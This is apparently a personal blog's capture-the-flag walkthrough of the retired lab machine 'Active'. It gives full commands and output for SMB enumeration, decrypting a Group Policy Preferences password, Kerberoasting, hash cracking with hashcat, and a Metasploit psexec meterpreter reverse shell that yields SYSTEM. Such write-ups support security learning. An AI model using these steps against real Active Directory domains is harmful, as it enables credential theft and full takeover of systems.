I had so much fun with this recently retired box. My skill set with Active Directory was lacking, so this was quite a learning experience!
Enumeration
Nmap baby, Nmap:
[bash]
nmap -sC -sV -p- -oA initial 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-08-02 18:13:42
|_ start_date: 2018-08-02 09:21:01
[/bash]
Wow, thats a lot of ports. From the inital scan, we can safely say that we are dealing with a Windows machine here. A couple of ports stand out: DNS (53), Samba (445), RPC (all over the place). I initially ran enum4linux on the box to explore the Samba shares, but found the smbmap tool while writing this post which gives a much more clear view of the situation:
[bash]
smbmap -H 10.10.10.100
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS
[/bash]
Let’s fire up smbclient to access the Replication share. Just press enter to login anonymously.
[bash]
smbclient //10.10.10.100/Replication
Unable to initialize messaging context
Enter WORKGROUP\user’s password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
[/bash]
Cool, that worked. Instead of going through all the directories on this share, I ran smbmap again, but this time the -R argument to list all directories. See what I found:
[bash]
smbmap -H 10.10.10.100 -R
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.100…
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
—- ———–
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
.\
dr–r–r– 0 Sat Jul 21 10:37:44 2018 .
dr–r–r– 0 Sat Jul 21 10:37:44 2018 ..
dr–r–r– 0 Sat Jul 21 10:37:44 2018 active.htb
*** Snip***
.\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
dr–r–r– 0 Sat Jul 21 10:37:44 2018 .
dr–r–r– 0 Sat Jul 21 10:37:44 2018 ..
-r–r–r– 533 Sat Jul 21 10:38:11 2018 Groups.xml
[/bash]
Ah, the infamous Groups.xml. From this excellent blog post:
Group policy preferences allows domain admins to create and deploy across the domain local users and local administrators accounts. This feature was introduced in Windows 2008 Server however it can be abused by an attacker since the credentials of these accounts are stored encrypted and the public key is published by Microsoft. This leaves the door open to any user to retrieve these files and decrypt the passwords stored in order to elevate access.
These files are stored in a shared directory in the domain controller and any authenticated user in the domain has read access to these files since it is needed in order to obtain group policy updates.
The contents of Groups.xml is the following:
[bash]
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
[/bash]
So we see 3 key values here:
- The domain (active.htb)
- Username (SVC_TGS)
- And the actual value (cpassword)
The stored value can be decrypted using either a Metasploit module, PowerSploit module or this tool I used called Gpprefdecrypt.py I’ve edited the hash and password a bit to prevent to usual Google-fu.
[bash]
python Gpprefdecrypt.py [e]dBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
[G]PPstillStandingStrong2k18
[/bash]
Exploitation
I switched to the Impacket toolset, based on the Kerberoasting posts I’ve found as noted on the tools page.
[bash]
python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev – Copyright 2002-2018 Core Security Technologies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
——————– ————- ——————————————————– ——————- ——————-
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40 2018-07-30 17:17:40
$[k]rb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$93a0a6cf83fa8e765bacccf1ea177432$b910699f5f73c858e8300ed38048b5fb0e7cfcadaef468c7fc8f80b41858e444c7586cde377debef18c50f6a9f13857887b31c808e7af81282a4eddbfb1da2610591908db563fb202762e28eb6f0157f70b8aa98dd53d694276ef0f126b896e543e2812b4b27461af3e791b7c4dcb245241a2706df6ae19da51750c470cdd010675d1d0ccba4e5ef5f656f230837f1e03b6eb6cf413559df7f8c11ae7dab8118bc1e99c7ebc1c2c4b7ff6f5b9ae04cd3f5013dcd21b4c34cc68a6cf56198a001adb38e847d9fde80b6d52b7f4357f59dc2e2f0af0f29e27dd20934f90c330e22d96c109d4071d712d20bc9274cc52b0ce56b3f0ed5176fc39edc1a9bbbae78cad6a9b6e6b53b211188e591ae49e5147d27593ed27e3a0ce4bee9fce01b73296dfa1026980f6b5047c31c9a494272d9a5f9de5f0634202ab44fc476844eaa9fe89ac1a393075635d111b5ec9ffd3399769e7d1f401071786b00639d132726dc83af898c93ac7c1cfcc2da92a506cc50040f36e5607cc70e731c13c9e6a2d3419e6b43a855922bde75d45f5ee9083728c828bb75dcfde9b84fb27d80b5661648db357c10e8ddd28c29f035cef9722c8906cc5dbd09d0614a28fe4bcde476532a7b868cea09d270cdfe9df2ba11330519463bbfbaa074d900376bfcb277fd92a61a2b3c598d8b3d6f45f23642161e3a37af70bcde771823a72e356c0116ad5da190380f1e0a07816eb680d404e468e46a5ac64a7a631d4dd85520357b3d190ca10d09d12635d12360b89787f7ab607287c7f243ec70f98fd9b05325745a91d25de64fdfdaf0ec72226c17f8a990a0465d84c7750213f36efaf7087b1f293b29cabd26abb7101d06865fa307a0ce39a2a80f294a485174564d3928d4920e07e6a44b0ac22d4f181d42c0c6baec02554f6995d2031160f9cc6d3819dbbb263be35de395951b27ed1d0ccf73e3724a0a7606ec8f5f5e84a47b4da508d277aa1967ef66c057cb031a4a06f8a3709f6ee2c2043316c2bcdd4740c685028eab2878d07edb164346bbfe3166680cac8c6d96c480dd6cf2c7d0a04f4d889ef26a887124ae28d28c709811f8f45a9f31d1f4aa77c2cc4311b76e54dd83a927d175dc91e34971528c2365175ef8d19db024f6b997901424da839c6b86df032a2db7841c69e40a3448dbcfc13b9aa51127d8f59605d35ac16fb9967ecaf9fbb011c979c8d30b62a6f08131f5fd3672fedbcf4f53e04ebe954841b32f6796c2a719
[/bash]
What we have here is the hash of the Kerberos ticket for the administrator account. With the Kerberos hash in place, I can start cracking it with Hashcat. I’ve put the hash into a file named administrator_hash.txt, use rockyou.txt as a wordlist and use –force to override some errors what I got:
[bash]
hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt –force
**Cracking***
Output = T[i]cketmaster1968
[/bash]
There we have the administrator password. Nice.
Privilege escalation
Finally, you can use psexec.py from the Impacket package to pass the cracked hash to the server to login. Or just login with smbclient using administrator and the cracked hash. I opted for the Metasploit module in this case, with a reverse TCP shell:
[bash]
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 10.10.10.100 yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,…) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass Ticketmaster1968 no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
— —-
0 Automatic
[/bash]
If all goes well, you will spawn a shell at the box as SYSTEM. Simply go to the desktop of the administrator for the root flag. You can even get the user flag from the user desktop.
[bash]
[*] Started reverse TCP handler on 10.10.14.10:443
[*] 10.10.10.100:445 – Connecting to the server…
[*] 10.10.10.100:445 – Authenticating to 10.10.10.100:445 as user ‘Administrator’…
[*] 10.10.10.100:445 – Selecting PowerShell target
[*] 10.10.10.100:445 – Executing the payload…
[+] 10.10.10.100:445 – Service start timed out, OK if running a command or non-service executable…
[*] Sending stage (179779 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.10:443 -> 10.10.10.100:63354) at 2018-12-11 01:55:49 +0000
meterpreter > shell
Process 2000 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
[/bash]
Psexec output as well:
[bash]
/psexec.py -target-ip 10.10.10.100 [email protected]
Impacket v0.9.18-dev – Copyright 2002-2018 Core Security Technologies
Password:
[*] Requesting shares on 10.10.10.100…..
[*] Found writable share ADMIN$
[*] Uploading file GtlPZcTM.exe
[*] Opening SVCManager on 10.10.10.100…..
[*] Creating service OAuq on 10.10.10.100…..
[*] Starting service OAuq…..
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
[/bash]
And as always, the Ippsec video on this box.